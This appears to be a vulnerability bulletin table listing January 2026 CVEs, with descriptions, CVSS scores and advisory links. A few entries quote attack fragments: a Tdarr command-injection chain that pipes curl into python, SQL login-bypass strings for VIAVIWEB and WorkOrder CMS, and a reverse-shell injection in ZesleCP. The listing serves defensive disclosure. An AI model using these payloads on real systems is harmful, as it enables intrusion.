| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.3.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the typed array hydration expecting an ArrayBuffer as input, but not checking the assumption before creating the typed array. This vulnerability is fixed in 5.6.2. | 2026-01-15 | 7.5 | CVE-2026-22774 | https://github.com/sveltejs/devalue/security/advisories/GHSA-vw5p-8cq8-m7mv https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7 https://github.com/sveltejs/devalue/releases/tag/v5.6.2 |
| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.1.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the ArrayBuffer hydration expecting base64 encoded strings as input, but not checking the assumption before decoding the input. This vulnerability is fixed in 5.6.2. | 2026-01-15 | 7.5 | CVE-2026-22775 | https://github.com/sveltejs/devalue/security/advisories/GHSA-g2pg-6438-jwpf https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4 https://github.com/sveltejs/devalue/releases/tag/v5.6.2 |
| Sylkat-Tools--AWebServer GhostBuilding | AWebServer GhostBuilding 18 contains a denial of service vulnerability that allows remote attackers to overwhelm the server by sending multiple concurrent HTTP requests. Attackers can generate high-volume requests to multiple endpoints including /mysqladmin to potentially crash or render the service unresponsive. | 2026-01-15 | 7.5 | CVE-2021-47752 | ExploitDB-50629 Vendor Homepage Software Download Link |
| Syncbreeze--Sync Breeze | Sync Breeze 13.6.18 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries located in 'Program Files' directories to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47807 | ExploitDB-50023 Vendor Homepage VulnCheck Advisory: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path |
| Sysax--Sysax Multi Server | Sysax Multi Server 6.95 contains a denial of service vulnerability in the administrative password field that allows attackers to crash the application. Attackers can overwrite the password field with 800 bytes of repeated characters to trigger an application crash and disrupt server functionality. | 2026-01-13 | 7.5 | CVE-2023-54337 | ExploitDB-51066 Vendor Homepage VulnCheck Advisory: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) |
| Sysgauge--SysGauge | SysGauge Server 7.9.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\SysGauge Server\bin\sysgaus.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2020-36930 | ExploitDB-50009 Vendor Homepage VulnCheck Advisory: SysGauge 7.9.18 - 'SysGauge Server' Unquoted Service Path |
| Tagstoo--Tagstoo | Tagstoo 2.0.1 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious payloads through files or custom tags. Attackers can execute arbitrary JavaScript code to spawn system processes, access files, and perform remote code execution on the victim's computer. | 2026-01-15 | 7.2 | CVE-2021-47843 | ExploitDB-49828 Tagstoo Official Homepage Proof of Concept Video |
| Tdarr--Tdarr | Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication. | 2026-01-13 | 9.8 | CVE-2022-50919 | ExploitDB-50822 Official Vendor Homepage VulnCheck Advisory: Tdarr 2.00.15 - Command Injection |
| TeamSpeak--TeamSpeak | TeamSpeak 3.5.6 contains an insecure file permissions vulnerability that allows local attackers to replace executable files with malicious binaries. Attackers can replace system executables like ts3client_win32.exe with custom files to potentially gain SYSTEM or Administrator-level access. | 2026-01-13 | 8.4 | CVE-2022-50931 | ExploitDB-50743 TeamSpeak Official Vendor Homepage TeamSpeak Downloads Page VulnCheck Advisory: TeamSpeak 3.5.6 - Insecure File Permissions |
| Telcel--FLAME II MODEM USB | Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Internet Telcel\ApplicationController.exe' to execute arbitrary code with elevated system privileges. | 2026-01-13 | 9.8 | CVE-2022-50935 | ExploitDB-50708 Archived Telcel Flame II MODEM USB Product Page VulnCheck Advisory: FLAME II MODEM USB - Unquoted Service Path |
| Telegram--Telegram Desktop | Telegram Desktop 2.9.2 contains a denial of service vulnerability that allows attackers to crash the application by sending an oversized message payload. Attackers can generate a 9 million byte buffer and paste it into the messaging interface to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47793 | ExploitDB-50247 Official Telegram Homepage VulnCheck Advisory: Telegram Desktop 2.9.2 - Denial of Service (PoC) |
| Tenable--Nessus Agent | A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows Hosts which could lead to escalation of privileges. | 2026-01-13 | 8.8 | CVE-2025-36640 | https://www.tenable.com/security/tns-2026-01 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0. | 2026-01-12 | 8 | CVE-2026-22804 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35 |
| Testlink--TestLink | TestLink versions 1.16 through 1.19 contain an unauthenticated file download vulnerability in the attachmentdownload.php endpoint. Attackers can download arbitrary files by iterating file IDs through the 'id' parameter with 'skipCheck=1' to bypass access controls. | 2026-01-15 | 9.8 | CVE-2021-47760 | ExploitDB-50578 Official TestLink Product Homepage Archived Researcher Blog |
| The Browser Company of New York--Dia | Missing about:blank indicator in custom-sized new windows in Dia before 1.9.0 on macOS could allow an attacker to spoof a trusted domain in the window title and mislead users about the current site. | 2026-01-16 | 7.4 | CVE-2025-15032 | https://www.diabrowser.com/security/bulletins#CVE-2025-15032 |
| Thecus--Thecus N4800Eco Nas Server Control Panel | Thecus N4800Eco NAS Server Control Panel contains a command injection vulnerability that allows authenticated attackers to execute arbitrary system commands through user management endpoints. Attackers can inject commands via username and batch user creation parameters to execute shell commands with administrative privileges. | 2026-01-16 | 8.8 | CVE-2021-47816 | ExploitDB-49926 Thecus Official Vendor Homepage Thecus N4800Eco Product Page Researcher Blog VulnCheck Advisory: Thecus N4800Eco Nas Server Control Panel - Command Injection |
| Totalav--TotalAV | TotalAV 5.15.69 contains an unquoted service path vulnerability in multiple system services running with LocalSystem privileges. Attackers can place malicious executables in specific unquoted path segments to potentially gain SYSTEM-level access by exploiting the service path configuration. | 2026-01-15 | 7.8 | CVE-2021-47787 | ExploitDB-50314 TotalAV Official Homepage VulnCheck Advisory: TotalAV 5.15.69 - Unquoted Service Path |
| tridenttechnolabs--Shipping Rate By Cities | The Shipping Rate By Cities plugin for WordPress is vulnerable to SQL Injection via the 'city' parameter in all versions up to, and including, 2.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 7.5 | CVE-2025-14770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/11e7e798-9fb9-4cff-a96f-a0003f203f5f?source=cve https://plugins.trac.wordpress.org/browser/shipping-rate-by-cities/trunk/shiprate-cities-method-class.php#L372 |
| Umbraco--Forms | In Umbraco UmbracoForms through 8.13.16, an authenticated attacker can supply a malicious WSDL (aka Webservice) URL as a data source for remote code execution. | 2026-01-16 | 7.5 | CVE-2025-68924 | https://our.umbraco.com/packages/developer-tools/umbraco-forms/ https://github.com/advisories/GHSA-vrgw-pc9c-qrrc https://www.nuget.org/packages/UmbracoForms |
| vaghasia3--News and Blog Designer Bundle | The News and Blog Designer Bundle plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1 via the template parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-01-14 | 9.8 | CVE-2025-14502 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e02683dc-0771-4bd5-bba3-2b5423da1c80?source=cve https://plugins.trac.wordpress.org/browser/news-and-blog-designer-bundle/trunk/includes/class-nbdb-ajax.php#L31 |
| vesparny--Marky | Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47839 | ExploitDB-49831 Marky GitHub Repository Proof of Concept Video VulnCheck Advisory: Marky 0.0.1 - Persistent Cross-Site Scripting |
| Vianeos--Vianeos OctoPUS | Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information. | 2026-01-15 | 8.2 | CVE-2021-47801 | ExploitDB-50078 Vendor Homepage Software Product Page VulnCheck Advisory: Vianeos OctoPUS 5 - 'login_user' SQLi |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains an unauthenticated remote code execution vulnerability in the image upload functionality. Attackers can upload a malicious PHP file through the add_gallery_image.php endpoint to execute arbitrary code on the server. | 2026-01-13 | 9.8 | CVE-2022-50893 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 - Code Execution via Image Upload |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. Attackers can send GET requests to edit_gallery_image.php with malicious img_id values to extract database information. | 2026-01-13 | 9.8 | CVE-2022-50894 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface. | 2026-01-13 | 8.2 | CVE-2022-50892 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page |
| VIVE--VIVE Runtime Service | VIVE Runtime Service 1.0.0.4 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path by placing malicious executables in specific system directories to gain LocalSystem access during service startup. | 2026-01-13 | 8.4 | CVE-2022-50918 | ExploitDB-50824 Official VIVE Homepage VIVE Developer Downloads VulnCheck Advisory: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path |
| Wago--WAGO 750-8212 PFC200 | WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication. | 2026-01-13 | 9.8 | CVE-2022-50926 | ExploitDB-50793 Official Vendor Homepage VulnCheck Advisory: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation |
| Wbce--WBCE CMS | WBCE CMS version 1.5.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious droplets through the admin panel. Authenticated attackers can exploit the droplet upload functionality in the admin tools to create and execute arbitrary PHP code by crafting a specially designed zip file payload. | 2026-01-13 | 8.8 | CVE-2022-50936 | ExploitDB-50707 WBCE CMS Official Website WBCE CMS Downloads Page WBCE CMS GitHub Repository VulnCheck Advisory: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated) |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2. | 2026-01-16 | 8.1 | CVE-2026-23535 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-mmwx-79f6-67jg https://github.com/WeblateOrg/wlc/pull/1128 https://github.com/WeblateOrg/wlc/commit/216e691c6e50abae97fe2e4e4f21501bf49a585f https://github.com/WeblateOrg/wlc/releases/tag/1.17.2 |
| Websitebaker--WebsiteBaker | WebsiteBaker 2.13.0 contains an authenticated remote code execution vulnerability that allows users with language editing permissions to execute arbitrary code. Attackers can exploit the language installation endpoint by manipulating language installation parameters to achieve remote code execution on the server. | 2026-01-15 | 8.8 | CVE-2021-47788 | ExploitDB-50310 WebsiteBaker Official Homepage VulnCheck Advisory: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) |
| WebSSH--WebSSH for iOS | WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash. | 2026-01-16 | 7.5 | CVE-2021-47827 | ExploitDB-49883 WebSSH iOS App Store Page VulnCheck Advisory: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service |
| Weird-Solutions--BOOTP Turbo | BOOTP Turbo 2.0.0.1253 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path to execute arbitrary code with elevated LocalSystem privileges during system startup or reboot. | 2026-01-16 | 7.8 | CVE-2021-47828 | ExploitDB-49851 Vendor Homepage VulnCheck Advisory: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path |
| Weird-Solutions--DHCP Broadband | DHCP Broadband 4.1.0.1503 contains an unquoted service path vulnerability in its service configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path in 'C:\Program Files\DHCP Broadband 4\dhcpt.exe' to inject malicious code that will execute during service startup with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47829 | ExploitDB-49850 Vendor Homepage VulnCheck Advisory: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path |
| Wibu--WibuKey Runtime | WibuKey Runtime 6.51 contains an unquoted service path vulnerability in the WkSvW32.exe service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47810 | ExploitDB-49999 Vendor Homepage Software Download Page VulnCheck Advisory: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path |
| Wisecleaner--Wise Care | Wise Care 365 5.6.7.568 contains an unquoted service path vulnerability in the WiseBootAssistant service running with LocalSystem privileges. Attackers can exploit this by inserting a malicious executable in the service path, which will execute with elevated system privileges when the service restarts. | 2026-01-15 | 7.8 | CVE-2021-47804 | ExploitDB-50038 Official Vendor Homepage VulnCheck Advisory: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path |
| Wondershare--Wondershare Dr.Fone | Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50900 | ExploitDB-50813 Vendor Homepage VulnCheck Advisory: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path |
| Wondershare--Wondershare Dr.Fone | Wondershare Dr.Fone 11.4.9 contains an unquoted service path vulnerability in the DFWSIDService that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\ to inject malicious executables that would run with LocalSystem privileges. | 2026-01-13 | 8.4 | CVE-2022-50901 | ExploitDB-50755 Vendor Homepage VulnCheck Advisory: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path |
| Wondershare--Wondershare FamiSafe | Wondershare FamiSafe 1.0 contains an unquoted service path vulnerability in the FSService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Wondershare\FamiSafe\ to inject malicious code that would run with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50902 | ExploitDB-50757 Vendor Homepage VulnCheck Advisory: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path |
| Wondershare--Wondershare MobileTrans | Wondershare MobileTrans 3.5.9 contains an unquoted service path vulnerability in the ElevationService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path by placing malicious executables in specific filesystem locations that will be executed with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50903 | ExploitDB-50756 Vendor Homepage VulnCheck Advisory: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path |
| Wondershare--Wondershare UBackit | Wondershare UBackit 2.0.5 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the wsbackup service to inject malicious executables that would run with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50904 | ExploitDB-50758 Vendor Homepage VulnCheck Advisory: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path |
| woosaai--Integration Opvius AI for WooCommerce | The Integration Opvius AI for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.0. This is due to the `process_table_bulk_actions()` function processing user-supplied file paths without authentication checks, nonce verification, or path validation. This makes it possible for unauthenticated attackers to delete or download arbitrary files on the server via the `wsaw-log[]` POST parameter, which can be leveraged to delete critical files like `wp-config.php` or read sensitive configuration files. | 2026-01-14 | 9.8 | CVE-2025-14301 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34612902-1a26-4759-bca6-b5aaffa25af4?source=cve https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L41 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L25 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L79 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L160 |
| Wordpress--Social-Share-Buttons | Social-Share-Buttons 2.2.3 contains a critical SQL injection vulnerability in the project_id parameter that allows attackers to manipulate database queries. Attackers can exploit this vulnerability by sending crafted POST requests with malicious SQL payloads to retrieve and potentially steal entire database contents. | 2026-01-13 | 8.2 | CVE-2023-54333 | ExploitDB-51116 WP Plugin Webpage Vulnerability Research Repository VulnCheck Advisory: Social-Share-Buttons 2.2.3 - SQL Injection via project_id Parameter |
| WorkOrder--WorkOrder CMS | WorkOrder CMS 0.1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login by manipulating username and password parameters. Attackers can inject malicious SQL queries using techniques like OR '1'='1' and stacked queries to access database information or execute administrative commands. | 2026-01-13 | 8.2 | CVE-2023-54340 | ExploitDB-51038 WorkOrder CMS GitHub Repository VulnCheck Advisory: WorkOrder CMS 0.1.0 - SQL Injection |
| Yenkee--Yenkee Hornet Gaming Mouse | Yenkee Hornet Gaming Mouse driver GM312Fltr.sys contains a buffer overrun vulnerability that allows attackers to crash the system by sending oversized input. Attackers can exploit the driver by sending a 2000-byte buffer through DeviceIoControl to trigger a kernel-level system crash. | 2026-01-15 | 7.5 | CVE-2021-47789 | ExploitDB-50311 Yenkee Vendor Webpage Quadron Research Lab Kernel Driver Bugs Repository VulnCheck Advisory: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /worksheet/del_work.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1120 | VDB-341712 \| Yonyou KSOA HTTP GET Parameter del_work.jsp sql injection VDB-341712 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734535 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/6 |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. This affects an unknown function of the file /worksheet/del_workplan.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1121 | VDB-341713 \| Yonyou KSOA HTTP GET Parameter del_workplan.jsp sql injection VDB-341713 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734548 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/7 |
| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. This impacts an unknown function of the file /worksheet/work_info.jsp of the component HTTP GET Parameter Handler. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1122 | VDB-341714 \| Yonyou KSOA HTTP GET Parameter work_info.jsp sql injection VDB-341714 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734549 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/8 |
| Yonyou--KSOA | A vulnerability was identified in Yonyou KSOA 9.0. Affected is an unknown function of the file /worksheet/work_mod.jsp of the component HTTP GET Parameter Handler. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1123 | VDB-341715 \| Yonyou KSOA HTTP GET Parameter work_mod.jsp sql injection VDB-341715 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734550 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/9 |
| Yonyou--KSOA | A security flaw has been discovered in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /worksheet/work_report.jsp of the component HTTP GET Parameter Handler. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1124 | VDB-341716 \| Yonyou KSOA HTTP GET Parameter work_report.jsp sql injection VDB-341716 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734551 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/10 |
| zalando--skipper | Skipper is an HTTP router and reverse proxy for service composition. The default skipper configuration before 0.23.0 was -lua-sources=inline,file. The problem starts if untrusted users can create lua filters because of -lua-sources=inline, for example through a Kubernetes Ingress resource. The inline configuration allows these users to create a script that is able to read the filesystem accessible to the skipper process, and if the user also has access to read the logs, they can read skipper secrets. This vulnerability is fixed in 0.23.0. | 2026-01-16 | 8.8 | CVE-2026-23742 | https://github.com/zalando/skipper/security/advisories/GHSA-cc8m-98fm-rc9g https://github.com/zalando/skipper/commit/0b52894570773b29e2f3c571b94b4211ef8fa714 https://github.com/zalando/skipper/releases/tag/v0.23.0 |
| Zeslecp--ZesleCP | ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host. | 2026-01-15 | 8.8 | CVE-2021-47794 | ExploitDB-50233 ZesleCP Official Website Exploit Demonstration Video VulnCheck Advisory: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) |
| Zohocorp--ManageEngine ADSelfService Plus | Zohocorp ManageEngine ADSelfService Plus versions before 6519 are vulnerable to Authentication Bypass due to improper filter configurations. | 2026-01-13 | 9.1 | CVE-2025-11250 | https://www.manageengine.com/products/self-service-password/advisory/CVE-2025-11250.html |
| Zohocorp--ManageEngine PAM360 | Zohocorp ManageEngine PAM360 versions before 8202; Password Manager Pro versions before 13221; Access Manager Plus versions prior to 4401 are vulnerable to an authorization issue in the initiate remote session functionality. | 2026-01-13 | 8.1 | CVE-2025-11669 | https://www.manageengine.com/privileged-access-management/advisory/cve-2025-11669.html |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user's browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17. | 2026-01-18 | 6.4 | CVE-2026-23525 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-mg24-6h5c-9q42 |
| A-Plus Video Technologies--AP-RM864P | Certain NVR models developed by A-Plus Video Technologies have a Sensitive Data Exposure vulnerability, allowing unauthenticated remote attackers to access the debug page and obtain device status information. | 2026-01-12 | 5.3 | CVE-2026-0853 | https://www.twcert.org.tw/tw/cp-132-10620-527f1-1.html https://www.twcert.org.tw/en/cp-139-10621-55584-2.html |
| aankit--SpiceForms Form Builder | The SpiceForms Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'spiceforms' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 6.4 | CVE-2025-12178 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9a19e96-2ca4-4072-aa2e-ab01f1685911?source=cve https://plugins.trac.wordpress.org/browser/spiceforms-form-builder/tags/1.0/spiceform.php#L135 |
| abage--Sosh Share Buttons | The Sosh Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'admin_page_content' function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-15377 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38b8b563-10a4-4343-b95a-7d09cf6fd729?source=cve https://plugins.trac.wordpress.org/browser/sosh-share-buttons/tags/1.1.0/sosh.class.php#L138 |
| Adobe--Illustrator | Illustrator versions 29.8.3, 30.0 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption to services. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21288 | https://helpx.adobe.com/security/products/illustrator/apsb26-03.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21278 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--Substance3D - Designer | Substance3D - Designer versions 15.0.3 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21308 | https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21300 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21301 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21302 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
